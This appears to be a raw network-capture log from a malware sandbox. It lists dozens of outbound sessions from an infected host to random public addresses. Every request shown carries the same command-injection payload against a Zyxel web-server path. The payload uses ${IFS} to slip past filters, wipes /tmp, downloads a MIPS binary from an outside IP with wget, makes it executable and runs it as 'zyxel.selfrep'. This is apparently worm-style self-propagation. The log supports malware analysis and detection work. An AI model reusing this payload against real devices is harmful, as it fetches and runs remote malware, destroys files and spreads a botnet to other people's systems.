                              Mar 31, 2024 08:41:46.080589056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6432192.168.2.1347588197.113.153.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080610037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6433192.168.2.133549867.134.255.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080643892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6434192.168.2.1347058207.57.255.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080692053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6435192.168.2.1353486165.196.167.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080724001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6436192.168.2.1345256195.199.224.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080790997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6437192.168.2.1341618152.15.27.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080812931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6438192.168.2.1351590104.54.224.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080864906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6439192.168.2.133725690.161.43.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080912113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6440192.168.2.1341574173.48.73.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.080966949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6441192.168.2.1342404182.159.123.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081031084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6442192.168.2.134982466.24.121.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081067085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6443192.168.2.135929272.243.246.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081106901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6444192.168.2.135940295.202.35.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081154108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6445192.168.2.135147423.188.241.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081192970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6446192.168.2.13355225.45.200.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081224918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6447192.168.2.134467868.109.202.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081279993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6448192.168.2.1354676167.145.165.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081337929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6449192.168.2.1358210105.61.163.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081366062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6450192.168.2.134089265.163.59.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081402063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6451192.168.2.1350238199.219.188.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081430912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6452192.168.2.1357756178.105.108.62443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081490040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6453192.168.2.1354082171.97.96.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081526041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6454192.168.2.1355568198.53.172.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081547022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6455192.168.2.1344782158.236.226.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081592083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6456192.168.2.135070466.183.129.247443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081619978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6457192.168.2.1356766121.198.119.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081655979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6458192.168.2.135928692.52.44.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081706047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6459192.168.2.1357810120.43.135.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081748009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6460192.168.2.133786249.167.174.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081792116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6461192.168.2.135901251.88.104.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081830025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6462192.168.2.134242646.216.217.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081882954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6463192.168.2.135237832.83.86.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081918001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6464192.168.2.1359396165.84.228.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.081969976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6465192.168.2.135536818.143.49.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082005024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6466192.168.2.1352600112.139.45.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082056046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6467192.168.2.1336462135.93.137.112443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082078934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6468192.168.2.1345234189.36.6.149443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082103014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6469192.168.2.135171089.32.171.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082171917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6470192.168.2.135266873.81.106.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082221985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6471192.168.2.135731066.248.180.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082264900 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6472192.168.2.1352568126.149.210.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082302094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6473192.168.2.1355236160.96.16.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082324982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6474192.168.2.1334310192.124.198.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082364082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6475192.168.2.1350916206.92.67.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082422972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6476192.168.2.1344234183.242.17.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082475901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6477192.168.2.135971088.150.156.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082510948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6478192.168.2.1360364107.53.61.111443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082532883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6479192.168.2.135850674.177.32.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082562923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6480192.168.2.13576442.35.114.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082613945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6481192.168.2.1332844204.107.244.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082649946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6482192.168.2.134724089.153.179.92443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082699060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6483192.168.2.1350434179.152.111.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082746983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6484192.168.2.1346880173.192.247.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082791090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6485192.168.2.1351404118.96.246.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082820892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6486192.168.2.1340768177.195.188.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082864046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6487192.168.2.1355322199.176.199.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082921982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6488192.168.2.1340532176.251.227.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082942963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6489192.168.2.1357360204.11.236.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.082983017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6490192.168.2.1353340223.50.71.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083018064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6491192.168.2.133764271.237.68.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083053112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6492192.168.2.1339100160.186.35.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083118916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6493192.168.2.133414668.146.158.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083153963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6494192.168.2.1352440223.41.145.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083184004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6495192.168.2.134857225.33.247.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083230972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6496192.168.2.1341032172.188.8.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083275080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6497192.168.2.1360960139.136.19.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083321095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6498192.168.2.1358138137.37.69.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083358049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6499192.168.2.1333056102.201.225.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:46.083417892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6500192.168.2.1351980149.253.117.221443
                              TimestampBytes transferredDirectionData
